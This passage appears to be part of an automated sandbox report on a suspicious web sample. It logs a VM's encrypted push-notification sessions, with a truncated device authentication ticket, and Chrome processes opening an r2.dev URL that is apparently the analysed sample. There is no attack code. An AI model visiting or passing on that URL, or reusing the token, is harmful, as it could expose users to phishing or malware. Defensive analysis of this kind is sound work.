                      2025-01-15 00:44:21 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: T0RBwX6SG0yZJgUh.2Context: 29c3509846f3fdd9<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWLz7E3J8rYGclUaYxEo72ssgjLEbG57NFffKd2GUjGiQzXphLU2ScDUaO25ACDygN0bfdfEY62QZkrjBZXieSwLjcvP19BT9erQ+NMM8WtQav
                      2025-01-15 00:44:21 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: T0RBwX6SG0yZJgUh.3Context: 29c3509846f3fdd9<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                      2025-01-15 00:44:21 UTC | 14 | IN | Data Ascii: 202 1 CON 58
                      2025-01-15 00:44:21 UTC | 58 | IN | Data Ascii: MS-CV: N7ae5kHFr0yYMbDIVMosnA.0Payload parsing failed.


                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                      6 | 192.168.2.6 | 49923 | 40.115.3.253 | 443
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-15 00:44:40 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: omkHMt0jZU25CEyv.1Context: 8b871d0f5f60d43b
                      2025-01-15 00:44:40 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      2025-01-15 00:44:40 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: omkHMt0jZU25CEyv.2Context: 8b871d0f5f60d43b<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWLz7E3J8rYGclUaYxEo72ssgjLEbG57NFffKd2GUjGiQzXphLU2ScDUaO25ACDygN0bfdfEY62QZkrjBZXieSwLjcvP19BT9erQ+NMM8WtQav
                      2025-01-15 00:44:40 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: omkHMt0jZU25CEyv.3Context: 8b871d0f5f60d43b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                      2025-01-15 00:44:40 UTC | 14 | IN | Data Ascii: 202 1 CON 58
                      2025-01-15 00:44:40 UTC | 58 | IN | Data Ascii: MS-CV: nufpaMg69kCosiefuQ4aJg.0Payload parsing failed.


                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                      7 | 192.168.2.6 | 50005 | 40.115.3.253 | 443
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-15 00:45:04 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: /igu4ggR80qFAobI.1Context: 646c1306133e3088
                      2025-01-15 00:45:04 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      2025-01-15 00:45:04 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: /igu4ggR80qFAobI.2Context: 646c1306133e3088<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWLz7E3J8rYGclUaYxEo72ssgjLEbG57NFffKd2GUjGiQzXphLU2ScDUaO25ACDygN0bfdfEY62QZkrjBZXieSwLjcvP19BT9erQ+NMM8WtQav
                      2025-01-15 00:45:04 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: /igu4ggR80qFAobI.3Context: 646c1306133e3088<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                      2025-01-15 00:45:04 UTC | 14 | IN | Data Ascii: 202 1 CON 58
                      2025-01-15 00:45:04 UTC | 58 | IN | Data Ascii: MS-CV: 03biQjgGJ0abrwhztf4uyg.0Payload parsing failed.



                      Target ID:1
                      Start time:19:43:54
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Imagebase:0x7ff684c40000
                      File size:3'242'272 bytes
                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:3
                      Start time:19:43:58
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2476,i,16925558641123395933,9700554553027330645,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Imagebase:0x7ff684c40000
                      File size:3'242'272 bytes
                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:4
                      Start time:19:44:04
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.html"
                      Imagebase:0x7ff684c40000
                      File size:3'242'272 bytes
                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      No disassembly